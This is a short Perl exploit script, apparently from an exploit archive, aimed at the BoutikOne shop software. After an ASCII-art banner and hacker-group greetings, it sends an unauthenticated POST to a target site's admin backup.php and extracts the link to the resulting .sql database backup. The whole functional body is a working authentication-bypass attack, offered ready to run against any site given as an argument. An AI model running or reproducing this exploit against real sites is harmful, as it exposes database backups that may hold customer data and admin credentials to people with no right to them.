#!/usr/bin/perl -w
# Exploit Title: BoutikOne ByPass & Download Backup Vulnerability
# Exploit Author: GarA
# Vendor Homepage: www.boutikone.com
# Tested on: Win Xp sp3
system ("color a");
system ("cls");
$num_args = $#ARGV + 1;
if ($num_args != 2) {
print " :MM:....:HMMM .MMMMMMMMMM. \n";
print " .M .. MM. M. :MMMMH \n";
print " M M MH .MM M \n" ;
print " .M HM M: MMMMMMH \n" ;
print " HM MMH :M MMMMMMMMMMMH \n" ;
print " .M MMMMMMM: . .MMMMMMMMMMM. \n" ;
print " M MMMM :MMMMMMMMH H M MMMMMMMM: \n" ;
print " MMM . :MMMMMMMM M MMMMMM \n" ;
print " M HMM H MM HMMMMM M. MMMMM \n" ;
print " .: .M H.: MMHMM M .MMM \n" ;
print " . .MM MM M: M :MMH MMMMM M. HMMM HMMMM .M. .M MH \n";
print " .. :MMMM: .M . MM. HMH :. MMM. .M MM MH .MM MMM :M: \n" ;
print " H : :MMH M .MM MH .MM . MMMM :M. MM MHM MM \n" ;
print " MM HM: : HM MM M .MH .MMM: MM M..M.:M: \n" ;
print " HM: .MMM :M MM MM :H .MH MM MM .MMM MMMM \n" ;
print " MMMMHHMM :MH M HMMMMH MH MMMMM MM .MM \n" ;
print " \n";
print "\n BoutikOne ByPass & Download Backup Vulnerability \n";
print "\nUsage: $0 site admin-path \n";
print "Example: $0 www.site.com admin \n";
print "=========================================\n";
print " Exploit discovered & coded by GarA \n";
print " Gr33tz to : Dr.Sayr0s , Dr.BiLLi , Last Breath \n";
print " Dr.Milas , O-Snip3r , Ev!l Code , P4L-T3RRORIST \n";
print " Mr NoRvI , Dr.sa3d , Mr MeGa , ViRuS_PaL , \n";
print " Scr3w & Arhack.net ";
exit;
}
$site=$ARGV[0];
$admn=$ARGV[1];
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("AgentName/0.1 " . $ua->agent);
my $req = new HTTP::Request POST => 'http://' . $site . '/'. $admn . '/backup.php';
$req->content_type('application/x-www-form-urlencoded');
$req->content('action2=go');
my $res = $ua->request($req);
if ($res->content =~ /admin.*?\.sql/ )
{
print ("Don3 ~\n");
print ("Download ; \n");
print ( $site . '/',$& ,"\n");
print ("3nj0y \n");
}
else
{
print "Faild :S \n";
}
